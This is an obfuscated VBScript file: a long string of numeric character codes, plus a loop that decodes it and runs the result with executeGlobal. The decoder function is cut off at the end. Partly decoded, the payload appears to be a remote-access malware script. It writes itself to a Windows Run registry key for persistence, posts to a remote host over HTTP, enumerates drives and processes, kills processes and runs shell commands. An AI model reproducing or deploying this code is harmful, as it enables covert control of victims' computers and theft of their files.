@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@86$@83$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@86$@83$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@188$@174$@189$@105$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@114$@86$@83$@188$@174$@189$@105$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@86$@83$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@133$@135$@105$@181$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@140$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@129$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@178$@175$@105$@105$@174$@187$@187$@119$@183$@190$@182$@171$@174$@187$@105$@135$@105$@121$@105$@189$@177$@174$@183$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@183$@170$@182$@174$@114$@86$@83$@86$@83$@188$@189$@187$@181$@178$@183$@180$@105$@134$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@105$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@176$@174$@189$@107$@117$@105$@188$@189$@187$@181$@178$@183$@180$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@105$@86$@83$@178$@175$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@105$@105$@105$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@82$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@119$@184$@185$@174$@183$@86$@83$@82$@82$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@173$@178$@187$@114$@86$@83$@86$@83$@178$@175$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@175$@178$@181$@174$@173$@178$@187$@105$@111$@105$@182$@178$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@105$@178$@183$@188$@189$@187$@187$@174$@191$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@107$@165$@107$@114$@105$@116$@105$@122$@114$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@188$@174$@183$@173$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@86$@83$@82$@82$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@105$@119$@184$@185$@174$@183$@86$@83$@82$@82$@105$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@105$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@82$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@190$@185$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@114$@86$@83$@86$@83$@173$@178$@182$@105$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@117$@171$@190$@175$@175$@174$@187$@86$@83$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@86$@83$@105$@105$@105$@105$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@105$@105$@105$@105$@105$@119$@184$@185$@174$@183$@86$@83$@82$@105$@119$@181$@184$@170$@173$@175$@187$@184$@182$@175$@178$@181$@174$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@82$@105$@171$@190$@175$@175$@174$@187$@105$@134$@105$@119$@187$@174$@170$@173$@86$@83$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@187$@174$@172$@191$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@183$@173$@105$@171$@190$@175$@175$@174$@187$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@113$@114$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@178$@175$@105$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@134$@105$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@111$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@197$@107$@105$@111$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@143$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@175$@170$@175$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@86$@83$@86$@83$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@173$@178$@187$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@175$@170$@175$@105$@111$@105$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@173$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@183$@174$@193$@189$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@174$@183$@190$@182$@173$@178$@187$@114$@119$@175$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@174$@183$@190$@182$@175$@170$@175$@105$@134$@105$@174$@183$@190$@182$@175$@170$@175$@105$@111$@105$@175$@178$@181$@174$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@178$@181$@174$@119$@188$@178$@195$@174$@105$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@175$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@113$@114$@86$@83$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@185$@187$@184$@172$@174$@188$@188$@107$@117$@117$@125$@129$@114$@86$@83$@86$@83$@173$@178$@182$@105$@184$@171$@179$@178$@189$@174$@182$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@82$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@183$@170$@182$@174$@105$@111$@105$@107$@197$@107$@86$@83$@82$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@185$@187$@184$@172$@174$@188$@188$@178$@173$@105$@111$@105$@107$@197$@107$@86$@83$@105$@105$@105$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@134$@105$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@111$@105$@184$@171$@179$@178$@189$@174$@182$@119$@174$@193$@174$@172$@190$@189$@170$@171$@181$@174$@185$@170$@189$@177$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@188$@190$@171$@105$@174$@193$@178$@189$@185$@187$@184$@172$@174$@188$@188$@105$@113$@185$@178$@173$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@189$@170$@188$@180$@180$@178$@181$@181$@105$@120$@143$@105$@120$@157$@105$@120$@153$@146$@141$@105$@107$@105$@111$@105$@185$@178$@173$@117$@128$@117$@189$@187$@190$@174$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@174$@181$@174$@189$@174$@175$@170$@175$@105$@113$@190$@187$@181$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@190$@187$@181$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@184$@181$@173$@174$@187$@105$@190$@187$@181$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@172$@182$@173$@188$@177$@174$@181$@181$@105$@113$@172$@182$@173$@114$@86$@83$@86$@83$@173$@178$@182$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@174$@193$@174$@172$@117$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@86$@83$@86$@83$@188$@174$@189$@105$@184$@174$@193$@174$@172$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@174$@172$@105$@113$@107$@110$@172$@184$@182$@188$@185$@174$@172$@110$@105$@120$@172$@105$@107$@105$@111$@105$@172$@182$@173$@114$@86$@83$@178$@175$@105$@183$@184$@189$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@184$@190$@189$@119$@170$@189$@174$@183$@173$@184$@175$@188$@189$@187$@174$@170$@182$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@184$@190$@189$@119$@187$@174$@170$@173$@170$@181$@181$@86$@83$@174$@181$@188$@174$@178$@175$@105$@183$@184$@189$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@174$@187$@187$@119$@170$@189$@174$@183$@173$@184$@175$@188$@189$@187$@174$@170$@182$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@184$@174$@193$@174$@172$@119$@188$@189$@173$@174$@187$@187$@119$@187$@174$@170$@173$@170$@181$@181$@86$@83$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@105$@134$@105$@107$@107$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@172$@182$@173$@188$@177$@174$@181$@181$@105$@134$@105$@187$@174$@170$@173$@170$@181$@181$@175$@187$@184$@182$@170$@183$@194$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@"
dim mfvasRGZIhZnddvphsOWz
mfvasRGZIhZnddvphsOWz = "$@"
mfvasRGZIhZnddvphsOW=SPLIT(mfvasRGZIhZnddvphsOW, mfvasRGZIhZnddvphsOWz)
dim FOFwEQObHcOMduGpSoigGY
FOFwEQObHcOMduGpSoigGY = 0
dim FOFwEQObHcOMduGpSoigGYv
FOFwEQObHcOMduGpSoigGYv = UBOUND(mfvasRGZIhZnddvphsOW) - 1
FOR FOFwEQObHcOMduGpSoigGYvX = FOFwEQObHcOMduGpSoigGY TO FOFwEQObHcOMduGpSoigGYv
Dim FOFwEQObHcOMduGpSoigGYvXJ
Dim FOFwEQObHcOMduGpSoigGYvXJZN
Dim FOFwEQObHcOMduGpSoigGYvXJZNx
Dim FOFwEQObHcOMduGpSoigGYvXJZNxD
FOFwEQObHcOMduGpSoigGYvXJZNxD = mfvasRGZIhZnddvphsOW(FOFwEQObHcOMduGpSoigGYvX)
FOFwEQObHcOMduGpSoigGYvXJZN = "mfvasRGZIhZ"
FOFwEQObHcOMduGpSoigGYvXJZNx = 11
FOFwEQObHcOMduGpSoigGYvXJ = FOFwEQObHcOMduGpSoigGYvXJZNxDE(chr(FOFwEQObHcOMduGpSoigGYvXJZNxD) , FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
FOFwEQObHcOMduGpSoigGYvXJZ = FOFwEQObHcOMduGpSoigGYvXJZ & FOFwEQObHcOMduGpSoigGYvXJ
NEXT
executeGlobal (FOFwEQObHcOMduGpSoigGYvXJZ)
Function FOFwEQObHcOMduGpSoigGYvXJZNxDEi( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL)
FOFwEQObHcOMduGpSoigGYvXJZNxDEiX = Array()
ReDim FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( CInt( Len( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL ) ) )
For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to Len(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL) - 1
FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO ) = Asc( Mid( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL,FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + 1 ,1 ) )
Next
FOFwEQObHcOMduGpSoigGYvXJZNxDEi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiX
End Function
Function FOFwEQObHcOMduGpSoigGYvXJZNxDE(FOFwEQObHcOMduGpSoigGYvXJZNxD, FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
Rnd(-1)
Randomize FOFwEQObHcOMduGpSoigGYvXJZNx
